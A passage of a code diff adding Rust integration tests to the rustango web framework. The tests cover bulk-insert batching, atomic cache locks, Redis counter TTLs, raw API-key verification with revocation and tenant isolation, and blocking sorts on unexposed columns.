-        })
+        .map(|raw| crate::list_params::parse_ordering(raw, &ordering_allowlist, state.vs.schema))
         .filter(|v| !v.is_empty())
         .unwrap_or_else(|| {
             state

--- a/crates/rustango/tests/bulk_insert_chunking_sqlite_live.rs
+++ b/crates/rustango/tests/bulk_insert_chunking_sqlite_live.rs
@@ -1,0 +1,158 @@
+//! `bulk_insert_pool` must batch against the backend's bind-parameter
+//! ceiling (#1284).
+//!
+//! One multi-row INSERT binds `rows × columns` parameters and every
+//! backend caps that: 65535 on Postgres (an int16 on the wire), 32766 on
+//! modern SQLite, `max_allowed_packet` on MySQL. Before this fix
+//! `bulk_insert_pool` emitted a single statement no matter the size, so
+//! a large import failed with an opaque driver error. Django's
+//! `bulk_create` batches for exactly this reason.
+//!
+//! SQLite is the right place to test it: its 32766 ceiling is the
+//! lowest of the three, so the row count stays small enough to run in
+//! milliseconds.
+//!
+//! ```bash
+//! cargo test -p rustango --no-default-features --features sqlite \
+//!   --test bulk_insert_chunking_sqlite_live
+//! ```
+
+#![cfg(feature = "sqlite")]
+
+use rustango::core::{BulkInsertQuery, Model as _, SqlValue};
+use rustango::sql::{bulk_insert_pool, raw_execute_pool, raw_query_pool, sqlx, Auto, Pool};
+use rustango::Model;
+
+#[derive(Model, Debug, Clone)]
+#[rustango(table = "bulk_chunk")]
+#[rustango(app = "bulk_chunk_app")]
+pub struct Chunked {
+    #[rustango(primary_key)]
+    pub id: Auto<i64>,
+    pub a: i64,
+    #[rustango(max_length = 50)]
+    pub b: String,
+    pub c: i64,
+    #[rustango(max_length = 50)]
+    pub d: String,
+}
+
+/// Four bound columns per row (the `Auto` pk is left to the database),
+/// so SQLite's 32766 ceiling lands the split at 8191 rows.
+const COLUMNS: usize = 4;
+const ROWS_PER_BATCH: usize = 32766 / COLUMNS; // 8191
+const ROWS: usize = 10_000;
+
+async fn pool_with_table() -> Pool {
+    let pool = Pool::Sqlite(
+        sqlx::SqlitePool::connect("sqlite::memory:")
+            .await
+            .expect("sqlite pool"),
+    );
+    raw_execute_pool(
+        &pool,
+        "CREATE TABLE bulk_chunk (\
+            id INTEGER PRIMARY KEY AUTOINCREMENT, \
+            a INTEGER NOT NULL, b TEXT NOT NULL, \
+            c INTEGER NOT NULL, d TEXT NOT NULL)",
+        vec![],
+    )
+    .await
+    .expect("create table");
+    pool
+}
+
+fn query(rows: Vec<Vec<SqlValue>>) -> BulkInsertQuery {
+    BulkInsertQuery {
+        model: Chunked::SCHEMA,
+        columns: vec!["a", "b", "c", "d"],
+        rows,
+        returning: Vec::new(),
+        on_conflict: None,
+    }
+}
+
+#[tokio::test]
+async fn bulk_insert_batches_past_the_bind_parameter_ceiling() {
+    let pool = pool_with_table().await;
+
+    let rows: Vec<Vec<SqlValue>> = (0..ROWS)
+        .map(|i| {
+            vec![
+                SqlValue::I64(i as i64),
+                SqlValue::String(format!("row-{i}")),
+                SqlValue::I64((i * 2) as i64),
+                SqlValue::String("filler".to_owned()),
+            ]
+        })
+        .collect();
+    assert_eq!(rows[0].len(), COLUMNS);
+    assert!(
+        ROWS > ROWS_PER_BATCH,
+        "the fixture must exceed one batch or it proves nothing"
+    );
+
+    // Before the fix this returned a driver error ("too many SQL
+    // variables") rather than inserting anything.
+    bulk_insert_pool(&pool, &query(rows))
+        .await
+        .expect("bulk_insert must batch, not overflow the parameter limit");
+
+    let counted: Vec<(i64,)> = raw_query_pool("SELECT COUNT(*) FROM bulk_chunk", vec![], &pool)
+        .await
+        .expect("count");
+    assert_eq!(
+        counted[0].0, ROWS as i64,
+        "every row must land, across all batches"
+    );
+
+    // Batching must not scramble or drop values at a chunk boundary.
+    let edge: Vec<(i64, String)> = raw_query_pool(
+        "SELECT a, b FROM bulk_chunk WHERE a IN (0, 8190, 8191, 8192, 9999) ORDER BY a",
+        vec![],
+        &pool,
+    )
+    .await
+    .expect("edge rows");
+    let got: Vec<(i64, &str)> = edge.iter().map(|(a, b)| (*a, b.as_str())).collect();
+    assert_eq!(
+        got,
+        vec![
+            (0, "row-0"),
+            (8190, "row-8190"),
+            (8191, "row-8191"),
+            (8192, "row-8192"),
+            (9999, "row-9999"),
+        ],
+        "values must stay aligned with their row across the chunk split"
+    );
+}
+
+/// A batch that fits must still be a single statement — the fast path
+/// is unchanged for the overwhelmingly common small insert.
+#[tokio::test]
+async fn small_bulk_insert_still_round_trips() {
+    let pool = pool_with_table().await;
+    let rows = vec![
+        vec![
+            SqlValue::I64(1),
+            SqlValue::String("one".into()),
+            SqlValue::I64(10),
+            SqlValue::String("x".into()),
+        ],
+        vec![
+            SqlValue::I64(2),
+            SqlValue::String("two".into()),
+            SqlValue::I64(20),
+            SqlValue::String("y".into()),
+        ],
+    ];
+    bulk_insert_pool(&pool, &query(rows))
+        .await
+        .expect("small insert");
+
+    let counted: Vec<(i64,)> = raw_query_pool("SELECT COUNT(*) FROM bulk_chunk", vec![], &pool)
+        .await
+        .expect("count");
+    assert_eq!(counted[0].0, 2);
+}

--- a/crates/rustango/tests/cache_db_backend_add_live.rs
+++ b/crates/rustango/tests/cache_db_backend_add_live.rs
@@ -1,0 +1,139 @@
+//! `DatabaseCache::add` set-if-absent semantics on **Postgres and
+//! MySQL** (#1281). The SQLite arm is covered in
+//! `cache_db_backend_sqlite_live.rs`.
+//!
+//! Worth its own file because the two arms are *different SQL*. PG and
+//! SQLite share `ON CONFLICT … DO UPDATE … WHERE`; MySQL has no WHERE
+//! on `ON DUPLICATE KEY UPDATE`, so it runs `INSERT IGNORE` followed by
+//! a conditional `UPDATE`. An untested dialect arm here means
+//! `DistributedLock` silently loses mutual exclusion on that backend —
+//! which is the bug this fixes.
+//!
+//! ```bash
+//! DATABASE_URL=postgres://rustango:rustango@127.0.0.1:5433/rustango_test \
+//! MYSQL_TEST_URL=mysql://rustango:rustango@127.0.0.1:3406/rustango_test \
+//!   cargo test -p rustango --all-features --test cache_db_backend_add_live
+//! ```
+//!
+//! Each backend skips silently when its env var is unset.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use rustango::cache::{Cache, DatabaseCache};
+use rustango::sql::Pool;
+
+/// Shared body: every assertion that must hold on every dialect.
+async fn assert_add_semantics(pool: Pool, table: &str) {
+    let cache = DatabaseCache::new(pool, table);
+    // Start from a known-empty table — a previous run's rows would
+    // otherwise make the first `add` look like a loser.
+    let _ = cache.drop_table().await;
+    cache.ensure_table().await.expect("ensure_table");
+
+    // 1. set-if-absent
+    assert!(
+        cache.add("lock:job", "token-a", None).await.unwrap(),
+        "{table}: first add must take the key"
+    );
+    assert!(
+        !cache.add("lock:job", "token-b", None).await.unwrap(),
+        "{table}: second add must be refused while live"
+    );
+    assert_eq!(
+        cache.get("lock:job").await.unwrap().as_deref(),
+        Some("token-a"),
+        "{table}: the loser must not overwrite the winner"
+    );
+
+    // 2. an expired entry is reclaimable (else a dead holder wedges
+    //    the lock forever)
+    assert!(cache
+        .add("lock:short", "a", Some(Duration::from_millis(150)))
+        .await
+        .unwrap());
+    tokio::time::sleep(Duration::from_millis(350)).await;
+    assert!(
+        cache
+            .add("lock:short", "c", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "{table}: expired entry must be reclaimable"
+    );
+
+    // 3. `expires = 0` means never — a persistent entry is never stolen
+    assert!(cache.add("persist", "first", None).await.unwrap());
+    tokio::time::sleep(Duration::from_millis(50)).await;
+    assert!(
+        !cache.add("persist", "second", None).await.unwrap(),
+        "{table}: a no-TTL entry must never look expired"
+    );
+
+    // 4. the real scenario: concurrent acquirers, exactly one winner.
+    //    Real client-side concurrency here, unlike SQLite's serialised
+    //    writer — this is the assertion that actually exercises the
+    //    database's row locking.
+    let cache = Arc::new(cache);
+    let mut handles = Vec::new();
+    for i in 0..16 {
+        let c = Arc::clone(&cache);
+        handles.push(tokio::spawn(async move {
+            c.add("lock:contended", &format!("t{i}"), None)
+                .await
+                .unwrap_or(false)
+        }));
+    }
+    let mut winners = 0;
+    for h in handles {
+        if h.await.unwrap() {
+            winners += 1;
+        }
+    }
+    assert_eq!(
+        winners, 1,
+        "{table}: exactly one concurrent acquirer may win; {winners} won"
+    );
+
+    let _ = cache.drop_table().await;
+}
+
+/// Connect, or skip.
+///
+/// "The env var is set" does **not** mean "the server is reachable": this
+/// workflow defines `DATABASE_URL` once at the top level, so it is present in
+/// every job — including `mysql_live`, which runs no Postgres service. A
+/// presence-only guard therefore let the Postgres case run there and spend 30s
+/// timing out before failing the job.
+///
+/// Skipping on a *connection* failure keeps that honest without hiding
+/// anything: the backend that is actually provisioned still runs its
+/// assertions, and a genuine outage in the job that does provide the server
+/// fails on its own many other tests.
+async fn pool_or_skip(var: &str) -> Option<Pool> {
+    let url = std::env::var(var).ok()?;
+    match Pool::connect(&url).await {
+        Ok(pool) => Some(pool),
+        Err(e) => {
+            eprintln!("skipping: {var} is set but unreachable ({e})");
+            None
+        }
+    }
+}
+
+#[cfg(feature = "postgres")]
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn add_is_atomic_on_postgres() {
+    let Some(pool) = pool_or_skip("DATABASE_URL").await else {
+        return;
+    };
+    assert_add_semantics(pool, "rustango_cache_add_pg").await;
+}
+
+#[cfg(feature = "mysql")]
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn add_is_atomic_on_mysql() {
+    let Some(pool) = pool_or_skip("MYSQL_TEST_URL").await else {
+        return;
+    };
+    assert_add_semantics(pool, "rustango_cache_add_my").await;
+}

--- a/crates/rustango/tests/cache_db_backend_sqlite_live.rs
+++ b/crates/rustango/tests/cache_db_backend_sqlite_live.rs
@@ -260,3 +260,122 @@ async fn delete_prefix_escapes_like_wildcards() {
         "`%` must be escaped, not treated as a multi-character wildcard"
     );
 }
+
+// ===================================================================
+// #1281 — `add` must be atomic set-if-absent.
+//
+// `DatabaseCache` never overrode `add`, so it inherited the trait
+// default (`exists()` then `set()`) — a check-then-act whose `set` is an
+// unconditional upsert. Two racers both saw "absent", both wrote, and
+// both got `Ok(true)`, which silently voided `DistributedLock`'s mutual
+// exclusion on this backend.
+// ===================================================================
+
+/// The core contract: first caller takes it, everyone after is refused
+/// while it is still live.
+#[tokio::test]
+async fn add_is_set_if_absent() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add");
+    cache.ensure_table().await.unwrap();
+
+    assert!(
+        cache.add("lock:job", "token-a", None).await.unwrap(),
+        "first add must take the key"
+    );
+    assert!(
+        !cache.add("lock:job", "token-b", None).await.unwrap(),
+        "second add must be refused while the key is live"
+    );
+    assert_eq!(
+        cache.get("lock:job").await.unwrap().as_deref(),
+        Some("token-a"),
+        "the loser must not overwrite the winner's value"
+    );
+}
+
+/// An expired entry is not a held lock — the next caller must be able
+/// to take it, or a lock whose holder died would wedge forever.
+#[tokio::test]
+async fn add_reclaims_an_expired_entry() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add_exp");
+    cache.ensure_table().await.unwrap();
+
+    assert!(cache
+        .add("lock:short", "token-a", Some(Duration::from_millis(150)))
+        .await
+        .unwrap());
+    assert!(
+        !cache
+            .add("lock:short", "token-b", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "still live — must be refused"
+    );
+
+    tokio::time::sleep(Duration::from_millis(300)).await;
+
+    assert!(
+        cache
+            .add("lock:short", "token-c", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "expired entry must be reclaimable"
+    );
+    assert_eq!(
+        cache.get("lock:short").await.unwrap().as_deref(),
+        Some("token-c")
+    );
+}
+
+/// `expires = 0` means "never expires". A persistent entry must never
+/// be treated as stale and stolen.
+#[tokio::test]
+async fn add_never_steals_a_persistent_entry() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add_persist");
+    cache.ensure_table().await.unwrap();
+
+    assert!(cache.add("k", "first", None).await.unwrap());
+    tokio::time::sleep(Duration::from_millis(50)).await;
+    assert!(
+        !cache.add("k", "second", None).await.unwrap(),
+        "a no-TTL entry must never look expired"
+    );
+    assert_eq!(cache.get("k").await.unwrap().as_deref(), Some("first"));
+}
+
+/// The scenario the bug actually broke: many concurrent acquirers,
+/// exactly one winner. Under the old non-atomic default this reports
+/// more than one.
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn concurrent_adds_produce_exactly_one_winner() {
+    use std::sync::Arc;
+
+    let pool = fresh_pool().await;
+    let cache = Arc::new(DatabaseCache::new(pool, "rustango_cache_add_race"));
+    cache.ensure_table().await.unwrap();
+
+    let mut handles = Vec::new();
+    for i in 0..16 {
+        let c = Arc::clone(&cache);
+        handles.push(tokio::spawn(async move {
+            c.add("lock:contended", &format!("token-{i}"), None)
+                .await
+                .unwrap_or(false)
+        }));
+    }
+
+    let mut winners = 0;
+    for h in handles {
+        if h.await.unwrap() {
+            winners += 1;
+        }
+    }
+    assert_eq!(
+        winners, 1,
+        "exactly one concurrent acquirer may win; {winners} won, so \
+         DistributedLock would have run its guarded body {winners} times"
+    );
+}

--- a/crates/rustango/tests/cache_redis_incr_live.rs
+++ b/crates/rustango/tests/cache_redis_incr_live.rs
@@ -1,0 +1,133 @@
+//! `RedisCache::incr` against a live Redis (#1280).
+//!
+//! The bug: `incr` set the window TTL with `EXPIRE key secs NX`. That
+//! flag is **Redis 7.0+** — on 6.x the server answers `ERR wrong number
+//! of arguments for 'expire' command`, so `incr` returned `Err` on
+//! *every* call. Both callers fail open, so rate limiting
+//! (`rate_limit_cache::take` → `Ok((0, 0))`) and account lockout
+//! (`account_lockout` → `.unwrap_or(0)`) silently stopped working, while
+//! the already-applied `INCRBY` left counters with no TTL at all.
+//!
+//! Nothing caught it: CI ran no Redis service, and the one existing
+//! Redis test never called `incr`.
+//!
+//! Run this against **both** 6 and 7 — the whole point is version
+//! portability:
+//!
+//! ```bash
+//! docker run -d -p 6398:6379 redis:6
+//! REDIS_TEST_URL=redis://127.0.0.1:6398/ \
+//!   cargo test -p rustango --features cache,cache-redis --test cache_redis_incr_live
+//! ```
+//!
+//! Reads `REDIS_TEST_URL`; skips silently when unset.
+
+#![cfg(feature = "cache-redis")]
+
+use std::time::Duration;
+
+use rustango::cache::redis_backend::RedisCache;
+use rustango::cache::Cache;
+use tokio::sync::Mutex;
+
+/// Suite-wide lock — the reset below is `FLUSHDB`, which is global, so
+/// concurrent tests would wipe each other's counters mid-run.
+fn live_lock() -> &'static Mutex<()> {
+    use std::sync::OnceLock;
+    static M: OnceLock<Mutex<()>> = OnceLock::new();
+    M.get_or_init(|| Mutex::new(()))
+}
+
+async fn cache() -> Option<RedisCache> {
+    let url = std::env::var("REDIS_TEST_URL").ok()?;
+    Some(RedisCache::new(&url).await.expect("connect REDIS_TEST_URL"))
+}
+
+/// The headline regression: `incr` must simply *work*, on every
+/// supported Redis. Against 6.x the old `EXPIRE … NX` form made this
+/// return `Err` every single time.
+#[tokio::test]
+async fn incr_with_ttl_succeeds_and_counts() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    let ttl = Some(Duration::from_secs(60));
+    assert_eq!(
+        redis
+            .incr("hits", 1, ttl)
+            .await
+            .expect("incr must not error"),
+        1
+    );
+    assert_eq!(redis.incr("hits", 1, ttl).await.unwrap(), 2);
+    assert_eq!(redis.incr("hits", 5, ttl).await.unwrap(), 7);
+}
+
+/// The semantic the `NX` flag was there to provide, kept intact by the
+/// Lua form: the TTL is set when the counter is created and **not**
+/// pushed forward by later increments. Without that a fixed-window rate
+/// limiter slides its window on every request and never reaches the cap.
+///
+/// Timed rather than introspected because `Cache` exposes no `TTL`
+/// (the crate has no `redis` dev-dependency to peek with). Margins are
+/// ~0.4s either side of a 2s window.
+#[tokio::test]
+async fn window_does_not_slide_on_later_increments() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    let ttl = Some(Duration::from_secs(2));
+    assert_eq!(redis.incr("win", 1, ttl).await.unwrap(), 1);
+
+    // Mid-window bump. If this reset the TTL, expiry moves to ~t+3.0s.
+    tokio::time::sleep(Duration::from_millis(1000)).await;
+    assert_eq!(redis.incr("win", 1, ttl).await.unwrap(), 2);
+
+    // Past the ORIGINAL window (t+2.0s) but before a slid one (t+3.0s).
+    tokio::time::sleep(Duration::from_millis(1400)).await;
+    assert_eq!(
+        redis.incr("win", 1, ttl).await.unwrap(),
+        1,
+        "counter should have expired with the original window; a value \
+         of 3 means the TTL slid forward and the window never closes"
+    );
+}
+
+/// `ttl = None` means "no expiry" — the counter must persist rather
+/// than inherit some accidental TTL from the script.
+#[tokio::test]
+async fn incr_without_ttl_leaves_the_counter_persistent() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    assert_eq!(redis.incr("forever", 1, None).await.unwrap(), 1);
+    tokio::time::sleep(Duration::from_millis(1200)).await;
+    assert_eq!(
+        redis.incr("forever", 1, None).await.unwrap(),
+        2,
+        "a None ttl must not expire the counter"
+    );
+}
+
+/// `decr` routes through `incr` with a negated step, so it rides the
+/// same script — check the negative path compiles down correctly.
+#[tokio::test]
+async fn decr_goes_negative_through_the_same_script() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    assert_eq!(redis.incr("bal", 5, None).await.unwrap(), 5);
+    assert_eq!(redis.decr("bal", 8, None).await.unwrap(), -3);
+}

--- a/crates/rustango/tests/mcp_raw_key.rs
+++ b/crates/rustango/tests/mcp_raw_key.rs
@@ -1,0 +1,252 @@
+//! Raw-credential bearer (epic #1013) — the copy-paste key path.
+//!
+//! A user-owned key's show-once `prefix.secret` token works directly as the
+//! Bearer credential: [`rustango::mcp::verify_raw_agent_credential`] verifies
+//! the secret (argon2, cached), re-checks liveness, and resolves grants
+//! **per request** — so capabilities always track the owner's live RBAC and
+//! revocation is immediate. Exercised end-to-end on SQLite:
+//!
+//!   create user → grant permission → skill(+tool) → map skill↔perm
+//!     → create_user_key → verify raw credential → scope reflects RBAC
+//!     → permission change reflects immediately → revoke → refused
+//!
+//! Run: `cargo test -p rustango --no-default-features --features sqlite,mcp,testkit --test mcp_raw_key`.
+#![cfg(all(feature = "sqlite", feature = "mcp", feature = "testkit"))]
+#![allow(irrefutable_let_patterns)] // Pool is single-variant in sqlite-only builds
+
+use rustango::mcp::verify_raw_agent_credential;
+use rustango::sql::{sqlx, Pool};
+use rustango::tenancy::permissions::set_user_perm_pool;
+use rustango::tenancy::{
+    create_skill_pool, create_user_key_pool, map_skill_to_permission_pool, revoke_user_key_pool,
+};
+
+async fn world() -> Pool {
+    let pool = Pool::Sqlite(
+        sqlx::SqlitePool::connect("sqlite::memory:")
+            .await
+            .expect("sqlite"),
+    );
+    rustango::testkit::migrate_framework(&pool)
+        .await
+        .expect("migrate framework");
+    pool
+}
+
+async fn make_user(pool: &Pool, name: &str) -> i64 {
+    let Pool::Sqlite(sq) = pool else {
+        unreachable!()
+    };
+    sqlx::query(
+        "INSERT INTO rustango_users (username, password_hash, is_superuser, active, created_at) \
+         VALUES (?, '', 0, 1, datetime('now'))",
+    )
+    .bind(name)
+    .execute(sq)
+    .await
+    .expect("insert user");
+    let (id,): (i64,) = sqlx::query_as("SELECT id FROM rustango_users WHERE username = ?")
+        .bind(name)
+        .fetch_one(sq)
+        .await
+        .expect("fetch id");
+    id
+}
+
+async fn skill_world(pool: &Pool) {
+    create_skill_pool(
+        pool,
+        "editor",
+        "Editor",
+        "edits things",
+        "You edit.",
+        &["edit_thing".into()],
+    )
+    .await
+    .expect("skill");
+    map_skill_to_permission_pool(pool, "editor", "thing.edit")
+        .await
+        .expect("map");
+}
+
+#[tokio::test]
+async fn raw_credential_resolves_live_rbac_scope() {
+    let pool = world().await;
+    skill_world(&pool).await;
+    let uid = make_user(&pool, "alice").await;
+    set_user_perm_pool(uid, "thing.edit", true, &pool)
+        .await
+        .expect("grant perm");
+
+    let issued = create_user_key_pool(&pool, uid, "alice's key", &[])
+        .await
+        .expect("key");
+
+    // The raw show-once token authenticates directly.
+    let agent = verify_raw_agent_credential(&pool, "acme", &issued.token)
+        .await
+        .expect("raw credential verifies");
+    assert_eq!(agent.user_id, Some(uid));
+    assert_eq!(agent.tenant, "acme");
+    assert_eq!(agent.skills, vec!["editor"]);
+    assert_eq!(agent.tools, vec!["edit_thing"]);
+    assert!(agent.jti.starts_with("raw:"));
+
+    // RBAC change reflects on the very next request (grants are never
+    // cached), including through the argon2-skip cache-hit path.
+    set_user_perm_pool(uid, "thing.edit", false, &pool)
+        .await
+        .expect("deny perm");
+    let narrowed = verify_raw_agent_credential(&pool, "acme", &issued.token)
+        .await
+        .expect("still authenticates");
+    assert!(narrowed.skills.is_empty(), "denied perm drops the skill");
+    assert!(narrowed.tools.is_empty());
+}
+
+#[tokio::test]
+async fn revoked_key_is_refused_immediately() {
+    let pool = world().await;
+    skill_world(&pool).await;
+    let uid = make_user(&pool, "bob").await;
+    set_user_perm_pool(uid, "thing.edit", true, &pool)
+        .await
+        .expect("grant");
+    let issued = create_user_key_pool(&pool, uid, "bob's key", &[])
+        .await
+        .expect("key");
+    let agent_id = issued.agent.id.get().copied().unwrap();
+
+    // Warm the verification cache with a successful call…
+    assert!(verify_raw_agent_credential(&pool, "acme", &issued.token)
+        .await
+        .is_some());
+    // …then revoke: the liveness check runs per request, so even a cached
+    // verification is refused straight away.
+    revoke_user_key_pool(&pool, uid, agent_id)
+        .await
+        .expect("revoke");
+    assert!(
+        verify_raw_agent_credential(&pool, "acme", &issued.token)
+            .await
+            .is_none(),
+        "revoked key must be refused despite the warm cache"
+    );
+}
+
+#[tokio::test]
+async fn deactivated_owner_is_refused() {
+    let pool = world().await;
+    let uid = make_user(&pool, "carol").await;
+    let issued = create_user_key_pool(&pool, uid, "carol's key", &[])
+        .await
+        .expect("key");
+    assert!(verify_raw_agent_credential(&pool, "acme", &issued.token)
+        .await
+        .is_some());
+
+    let Pool::Sqlite(sq) = &pool else {
+        unreachable!()
+    };
+    sqlx::query("UPDATE rustango_users SET active = 0 WHERE id = ?")
+        .bind(uid)
+        .execute(sq)
+        .await
+        .expect("deactivate");
+    assert!(
+        verify_raw_agent_credential(&pool, "acme", &issued.token)
+            .await
+            .is_none(),
+        "a deactivated owner's keys must be refused"
+    );
+}
+
+#[tokio::test]
+async fn garbage_and_wrong_secrets_are_refused() {
+    let pool = world().await;
+    let uid = make_user(&pool, "dave").await;
+    let issued = create_user_key_pool(&pool, uid, "dave's key", &[])
+        .await
+        .expect("key");
+
+    // No dot → shape gate refuses without touching the DB.
+    assert!(verify_raw_agent_credential(&pool, "acme", "not-a-key")
+        .await
+        .is_none());
+    // Empty halves.
+    assert!(verify_raw_agent_credential(&pool, "acme", ".")
+        .await
+        .is_none());
+    // Right prefix, wrong secret.
+    let prefix = issued.token.split('.').next().unwrap();
+    let forged = format!("{prefix}.deadbeefdeadbeefdeadbeefdeadbeef");
+    assert!(verify_raw_agent_credential(&pool, "acme", &forged)
+        .await
+        .is_none());
+    // A JWT-shaped bearer (three dot-separated base64 parts) must not
+    // authenticate as a raw credential either.
+    assert!(verify_raw_agent_credential(&pool, "acme", "eyJx.eyJy.sig")
+        .await
+        .is_none());
+}
+
+/// A credential minted in one tenant must not authenticate against another —
+/// end to end, and specifically not via a cache warmed by the owning tenant.
+///
+/// The primary control is the pool boundary: the agent row exists only in its
+/// own tenant's database, so the prefix lookup finds nothing elsewhere. The
+/// per-request liveness re-check backstops it even on a cache hit, which is
+/// why this stays green regardless of whether the argon2-skip cache key
+/// carries the tenant (it does — `sha256(tenant \0 token)` — but that is
+/// defence in depth here, not the property under test).
+#[tokio::test]
+async fn credential_does_not_cross_tenants() {
+    let acme = world().await;
+    let globex = world().await;
+    skill_world(&acme).await;
+    skill_world(&globex).await;
+
+    let uid = make_user(&acme, "alice").await;
+    set_user_perm_pool(uid, "thing.edit", true, &acme)
+        .await
+        .expect("grant perm");
+    let issued = create_user_key_pool(&acme, uid, "alice's key", &[])
+        .await
+        .expect("key");
+
+    // Warm the cache on the owning tenant first.
+    assert!(
+        verify_raw_agent_credential(&acme, "acme", &issued.token)
+            .await
+            .is_some(),
+        "owning tenant must authenticate"
+    );
+
+    // Same token, other tenant's pool + slug: no such agent, and the warm
+    // cache entry must not be reused across the slug boundary.
+    assert!(
+        verify_raw_agent_credential(&globex, "globex", &issued.token)
+            .await
+            .is_none(),
+        "credential must not authenticate against another tenant"
+    );
+
+    // Cross-tenant is refused even when the foreign slug is presented
+    // against the owning pool's token first — i.e. the cache key, not just
+    // the pool, carries the tenant.
+    assert!(
+        verify_raw_agent_credential(&globex, "acme", &issued.token)
+            .await
+            .is_none(),
+        "foreign pool must refuse even with the owning slug"
+    );
+
+    // The owning tenant still works afterwards — isolation must not have
+    // poisoned the legitimate entry.
+    assert!(
+        verify_raw_agent_credential(&acme, "acme", &issued.token)
+            .await
+            .is_some(),
+        "owning tenant still authenticates after cross-tenant attempts"
+    );
+}

--- a/crates/rustango/tests/viewset_derive_pool_tridialect_compile.rs
+++ b/crates/rustango/tests/viewset_derive_pool_tridialect_compile.rs
@@ -1,0 +1,43 @@
+//! #1273 regression: `#[derive(ViewSet)]`'s `router()` must not name a
+//! backend-specific pool, so a derive compiles on ANY single backend.
+//! It previously named `sqlx::PgPool` and broke every sqlite/mysql-only
+//! project. One `router()` fn per dialect, each cfg'd to its feature so
+//! it is exercised in that backend's build (the sqlite/mysql arms are
+//! the ones that regress without postgres present).
+
+#![cfg(feature = "admin")]
+
+use rustango::sql::Auto;
+use rustango::{Model, ViewSet};
+
+#[derive(Model, Clone)]
+#[rustango(table = "vs_pool_post")]
+pub struct Post {
+    #[rustango(primary_key)]
+    pub id: Auto<i64>,
+    #[rustango(max_length = 200)]
+    pub title: String,
+}
+
+#[derive(ViewSet)]
+#[viewset(model = Post)]
+pub struct PostViewSet;
+
+// Compile-only: router() accepts each backend's pool via Into<Pool>.
+#[cfg(feature = "postgres")]
+#[allow(dead_code)]
+fn _pg(pool: rustango::sql::sqlx::PgPool) -> axum::Router {
+    PostViewSet::router("/api/posts", pool)
+}
+
+#[cfg(feature = "sqlite")]
+#[allow(dead_code)]
+fn _sqlite(pool: rustango::sql::sqlx::SqlitePool) -> axum::Router {
+    PostViewSet::router("/api/posts", pool)
+}
+
+#[cfg(feature = "mysql")]
+#[allow(dead_code)]
+fn _mysql(pool: rustango::sql::sqlx::MySqlPool) -> axum::Router {
+    PostViewSet::router("/api/posts", pool)
+}

--- a/crates/rustango/tests/viewset_ordering_filter_sqlite_live.rs
+++ b/crates/rustango/tests/viewset_ordering_filter_sqlite_live.rs
@@ -227,3 +227,111 @@ async fn ordering_fields_whitelist_drops_off_list_names() {
     .await;
     assert_eq!(ids(&body), vec![2, 3, 1]); // rating ASC
 }
+
+// ===================================================================
+// #1282 — with no explicit `ordering_fields`, the allowlist defaults to
+// the fields the ViewSet EXPOSES, not every column on the model.
+//
+// The old default skipped the allowlist check entirely when
+// `ordering_fields` was empty, so a ViewSet restricted to
+// `fields = "id, title, rating"` still honoured
+// `?ordering=secret_score` — a sort oracle over a column the API never
+// returns. DRF defaults to the serializer's readable fields.
+// ===================================================================
+
+/// Rows are seeded so that sorting by `secret_score` gives a *different*
+/// order from the default — if the unexposed sort were honoured, the ids
+/// would come back in secret order, which is exactly the leak.
+async fn seed_divergent(app: &axum::Router) {
+    for (title, rating, secret) in [("a", 1, "zzz"), ("b", 2, "mmm"), ("c", 3, "aaa")] {
+        let payload = serde_json::json!({
+            "title": title, "rating": rating, "secret_score": secret
+        })
+        .to_string();
+        let resp = app
+            .clone()
+            .oneshot(
+                Request::builder()
+                    .method(Method::POST)
+                    .uri("/posts")
+                    .header(header::CONTENT_TYPE, "application/json")
+                    .body(Body::from(payload))
+                    .unwrap(),
+            )
+            .await
+            .unwrap();
+        assert!(resp.status().is_success());
+    }
+}
+
+#[tokio::test]
+async fn ordering_on_an_unexposed_field_is_dropped_by_default() {
+    let pool = fresh_pool().await;
+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .fields(&["id", "title", "rating"]) // secret_score NOT exposed
+        .ordering(&[("id", false)])
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    // secret_score ASC would be c(aaa), b(mmm), a(zzz) => [3, 2, 1].
+    // It must be ignored, leaving the default id ASC => [1, 2, 3].
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=secret_score"))
+        .await
+        .unwrap();
+    assert_eq!(resp.status(), StatusCode::OK);
+    let body = body_json(resp).await;
+    assert_eq!(
+        ids(&body),
+        vec![1, 2, 3],
+        "sorting by an unexposed column must be dropped, not honoured — \
+         got the secret order, which leaks its values"
+    );
+}
+
+/// The restriction must not break ordering on fields that ARE exposed.
+#[tokio::test]
+async fn ordering_on_an_exposed_field_still_works() {
+    let pool = fresh_pool().await;
+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .fields(&["id", "title", "rating"])
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=-rating"))
+        .await
+        .unwrap();
+    let body = body_json(resp).await;
+    assert_eq!(ids(&body), vec![3, 2, 1], "exposed field must still sort");
+}
+
+/// When `fields` is unset the ViewSet exposes everything, so ordering
+/// stays permissive — the fix must not tighten that case.
+#[tokio::test]
+async fn ordering_stays_open_when_no_fields_restriction_is_set() {
+    let pool = fresh_pool().await;
